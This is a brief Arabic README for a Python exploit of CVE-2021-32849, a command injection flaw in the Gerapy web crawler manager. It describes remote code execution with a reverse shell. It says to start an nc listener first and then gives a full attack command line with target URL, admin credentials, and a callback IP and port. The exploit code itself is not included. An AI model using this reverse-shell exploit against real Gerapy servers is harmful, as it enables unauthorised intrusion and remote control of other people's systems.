
استغلال بلغة بايثون لثغرة CVE-2021-32849، وهي حقن أوامر في Gerapy، مما يتيح تنفيذ الأكواد عن بُعد مع قشرة عكسية.
cve-2021-32849 (تنفيذ أوامر في Gerapy)
قم أولاً بتشغيل nc للاستماع، ثم استخدم exp للهجوم
python3 CVE-2021-32849.py -u http://192.168.1.69:8000 -U admin -P admin@123 -r 10.10.16.34 -p 8888 -c id
